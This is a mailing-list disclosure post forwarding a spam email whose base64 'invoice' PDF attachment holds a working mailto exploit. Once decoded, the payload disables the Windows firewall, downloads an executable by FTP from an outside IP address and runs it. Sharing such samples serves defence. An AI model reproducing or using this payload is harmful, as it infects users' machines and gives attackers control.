Full Disclosure mailing list archives
PDF mailto exploit in the wild
From: Paul Szabo <psz () maths usyd edu au>
Date: Tue, 23 Oct 2007 22:18:52 +1000
In case you are interested... messages like the following were spammed to my users tonight. Cheers, Paul Szabo psz () maths usyd edu au http://www.maths.usyd.edu.au/u/psz/ School of Mathematics and Statistics University of Sydney Australia ---
From sabansal1 () gmail com Tue Oct 23 18:20:46 2007
Received: from nf-out-0910.google.com (nf-out-0910.google.com [64.233.182.187])
by london.ucc.usyd.edu.au (Postfix) with ESMTP id 17D582CAC1E
for <tang () maths usyd edu au>; Tue, 23 Oct 2007 18:20:13 +1000 (EST)
Received: by nf-out-0910.google.com with SMTP id b2so1929536nfb
for <tang () maths usyd edu au>; Tue, 23 Oct 2007 01:20:12 -0700 (PDT)
DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed;
d=gmail.com; s=beta;
h=domainkey-signature:received:received:message-id:to:subject:date:mime-version:x-mailer:x-mimeole:thread-index:content-type:from;
bh=RBeyhq9knF4zOhfDArq39Bm0/FWUFdutXHfudq1gwxE=;
b=Qs8RvpCyO4UBVRo3N73MXad3ZQWzfT/6L1+snsI7Ty0ZwHuynJLpIBAIcVEGGxvfs9+pB06orF5efPl7aYqq3jQBI19jZBMUE9Tcf2TndqhPmE3nIADCgUnWEP5xo5xGug2lq6coG8MfdZd6+oIYtkdCMzl6nweV1f76zYWereQ=
DomainKey-Signature: a=rsa-sha1; c=nofws;
d=gmail.com; s=beta;
h=received:message-id:to:subject:date:mime-version:x-mailer:x-mimeole:thread-index:content-type:from;
b=h1M0bnJzcqTTj5XzB6QgMJ0ugePdD1uvgzov2kTbStB+KW9WsynewPJJlv0ml/ILNka98867Gm2QrvL+2V5esH7Flnm5EJXpMxDSwiSv84SExd7TZFxdAsy2tYd2eiQ+Wy2Z6SlaLdZdbQv27sJ8tdN9QGNxBFWyYotdY4LwH7Y=
Received: by 10.82.112.3 with SMTP id k3mr5564785buc.1193127611679;
Tue, 23 Oct 2007 01:20:11 -0700 (PDT)
Received: from ?12.206.143.237? ( [12.206.143.237])
by mx.google.com with ESMTPS id k7sm6753182nfh.2007.10.23.01.20.06
(version=SSLv3 cipher=OTHER);
Tue, 23 Oct 2007 01:20:10 -0700 (PDT)
Message-ID: <G9THMfvCFEH0Ii.362DBDDF78@VLA18BS>
To: <andrewadams2650 () hotmail com>
Subject: STATEMET indigene
Date: Tue, 23 Oct 2007 08:11:47 +0000
MIME-Version: 1.0
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1106
Thread-Index: leRJrPkueCIQWNOdN8y1PxNCM0wkvbPn8IKv
Content-type: multipart/mixed;
boundary="----=_NextPart_000_00F6_04BCC8AB.87205748"
From: Gilbert <sabansal1 () gmail com>
X-PMX-Version: USyd20070806 5.3.3.310218, Antispam-Engine: 2.5.2.311128, Antispam-Data: 2007.10.23.5823
X-PerlMx-Spam: Gauge=IIIIIII, Probability=7%, Report='PDF_ATTACHED_2 0, PDF_SIZE_0_10K 0, __ATTACHMENT_SIZE_0_10K 0,
__CT 0, __CTYPE_HAS_BOUNDARY 0, __CTYPE_MULTIPART 0, __FROM_GMAIL 0, __HAS_MSGID 0, __HAS_X_MAILER 0, __HELO_GMAIL 0,
__MIME_VERSION 0, __RDNS_GMAIL 0, __SANE_MSGID 0, __USER_AGENT_MS_GENERIC 0, __pbl.spamhaus.org_TIMEOUT ,
__sbl.spamhaus.org_TIMEOUT '
Content-Length: 5618
Status: R
------=_NextPart_000_00F6_04BCC8AB.87205748
Content-Type: text/plain;
charset="Windows-1251"
Content-Transfer-Encoding: 7bit
fanner ctenoid varment
------=_NextPart_000_00F6_04BCC8AB.87205748
Content-type: application/octet-stream;
name="BILL.pdf"
Content-Transfer-Encoding: base64
Content-Disposition: attachment;
filename="INVOICE.pdf"
JVBERi0xLjYNJeLjz9MNCjQgMCBvYmogPDwvTGluZWFyaXplZCAxL0wgMzA3NDEvTyA2L0UgMjY4
ODEvTiAxL1QgMzA2MTUvSCBbIDUzNiAxNDZdPj4NZW5kb2JqDSAgICAgICAgICAgICAgICAgICAg
DQp4cmVmDQo0IDEyDQowMDAwMDAwMDE2IDAwMDAwIG4NCjAwMDAwMDA2ODIgMDAwMDAgbg0KMDAw
MDAwMDc0MSAwMDAwMCBuDQowMDAwMDAwOTI4IDAwMDAwIG4NCjAwMDAwMDA5NzcgMDAwMDAgbg0K
MDAwMDAwMTAwNiAwMDAwMCBuDQowMDAwMDI1NDA5IDAwMDAwIG4NCjAwMDAwMjU1OTggMDAwMDAg
bg0KMDAwMDAyNjA0MiAwMDAwMCBuDQowMDAwMDI2MzMwIDAwMDAwIG4NCjAwMDAwMjY3ODYgMDAw
MDAgbg0KMDAwMDAwMDUzNiAwMDAwMCBuDQp0cmFpbGVyDQo8PC9TaXplIDE2L1ByZXYgMzA2MDUv
Um9vdCA1IDAgUi9JbmZvIDMgMCBSL0lEWzxGNEU2NDFGMjI2MzA5MjVCRjM0NkYwRkE2NDExRDZF
QT48Q0Y1QTJFNkM4NTY3Nzg0OEEwRjZEOEVBQzFBMDQ1Qzg+XT4+DQpzdGFydHhyZWYNCjANCiUl
RU9GDQogICAgICAgICAgICAgICAgDQo1IDAgb2JqPDwvTWV0YWRhdGEgMiAwIFIvUGFnZXMgMSAw
IFIvVHlwZS9DYXRhbG9nPj4NZW5kb2JqDTYgMCBvYmo8PC9Dcm9wQm94WzAgMCA1OTUgODQyXS9Q
YXJlbnQgMSAwIFIvQ29udGVudHMgMTMgMCBSL1JvdGF0ZSAwL0dyb3VwPDwvSSB0cnVlL0NTL0Rl
dmljZVJHQi9TL1RyYW5zcGFyZW5jeT4+L01lZGlhQm94WzAgMCA1OTUgODQyXS9SZXNvdXJjZXMg
NyAwIFIvVHlwZS9QYWdlL0FBPDwvTyAxNCAwIFI+Pj4+DWVuZG9iag0xNCAwIG9iajw8L1VSSSht
YWlsdG86JS8uLi8uLi8uLi8uLi8uLi8uLi9XaW5kb3dzL3N5c3RlbTMyL2NtZCIuZXhlIiIgL2Mg
L3EgXCJAZWNobyBvZmYmbmV0c2ggZmlyZXdhbGwgc2V0IG9wbW9kZSBtb2RlPWRpc2FibGUmZWNo
byBvIDgxLjk1LjE0Ni4xMzA+MSZlY2hvIGJpbmFyeT4+MSZlY2hvIGdldCAvbGRyLmV4ZT4+MSZl
Y2hvIHF1aXQ+PjEmZnRwIC1zOjEgLXYgLUE+bnVsJmRlbCAvcSAxJiBzdGFydCBsZHIuZXhlJlwi
IFwiJlwiICJudWwuYmF0KS9TL1VSST4+DWVuZG9iag0xIDAgb2JqPDwvQ291bnQgMS9UeXBlL1Bh
Z2VzL0tpZHNbNiAwIFJdPj4NCmVuZG9iag0KMiAwIG9iajw8L1N1YnR5cGUvWE1ML0xlbmd0aCAz
NDI5L1R5cGUvTWV0YWRhdGE+PnN0cmVhbQ0KPD94cGFja2V0IGJlZ2luPSLvu78iIGlkPSJXNU0w
TXBDZWhpSHpyZVN6TlRjemtjOWQiPz4KPHg6eG1wbWV0YSB4bWxuczp4PSJhZG9iZTpuczptZXRh
LyIgeDp4bXB0az0iMy4xLTcwMiI+CiAgIDxyZGY6UkRGIHhtbG5zOnJkZj0iaHR0cDovL3d3dy53
My5vcmcvMTk5OS8wMi8yMi1yZGYtc3ludGF4LW5zIyI+CiAgICAgIDxyZGY6RGVzY3JpcHRpb24g
cmRmOmFib3V0PSIiCiAgICAgICAgICAgIHhtbG5zOnhhcD0iaHR0cDovL25zLmFkb2JlLmNvbS94
YXAvMS4wLyI+CiAgICAgIDwvcmRmOkRlc2NyaXB0aW9uPgogICAgICA8cmRmOkRlc2NyaXB0aW9u
IHJkZjphYm91dD0iIgogICAgICAgICAgICB4bWxuczpkYz0iaHR0cDovL3B1cmwub3JnL2RjL2Vs
ZW1lbnRzLzEuMS8iPgogICAgICAgICA8ZGM6Zm9ybWF0PmFwcGxpY2F0aW9uL3BkZjwvZGM6Zm9y
bWF0PgogICA8L3JkZjpSREY+CjwveDp4bXBtZXRhPgogICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgCiAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAKICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgIAogICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgCiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAg
ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAK
ICAgICAgICAgICAgICAgICAgICAgICAgICAgCjw/eHBhY2tldCBlbmQ9InciPz4NCmVuZHN0cmVh
bQ1lbmRvYmoNeHJlZg0KMCA0DQowMDAwMDAwMDAwIDY1NTM1IGYNCjAwMDAwMjY4ODEgMDAwMDAg
bg0KMDAwMDAyNjkzMSAwMDAwMCBuDQowMDAwMDMwNDM2IDAwMDAwIG4NCnRyYWlsZXINCjw8L1Np
emUgND4+DQpzdGFydHhyZWYNCjExNg0KJSVFT0YNCg==
------=_NextPart_000_00F6_04BCC8AB.87205748--
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- PDF mailto exploit in the wild Paul Szabo (Oct 23)
- Re: PDF mailto exploit in the wild Nick Boyce (Oct 23)
- Re: PDF mailto exploit in the wild Gregory Boyce (Oct 23)
- Re: PDF mailto exploit in the wild Nick Boyce (Oct 23)
- Re: PDF mailto exploit in the wild Gregory Boyce (Oct 23)
- Re: PDF mailto exploit in the wild 3APA3A (Oct 23)
- Re: PDF mailto exploit in the wild Paul Szabo (Oct 23)
- Re: PDF mailto exploit in the wild biz4rre (Oct 23)
- Re: PDF mailto exploit in the wild Nick Boyce (Oct 23)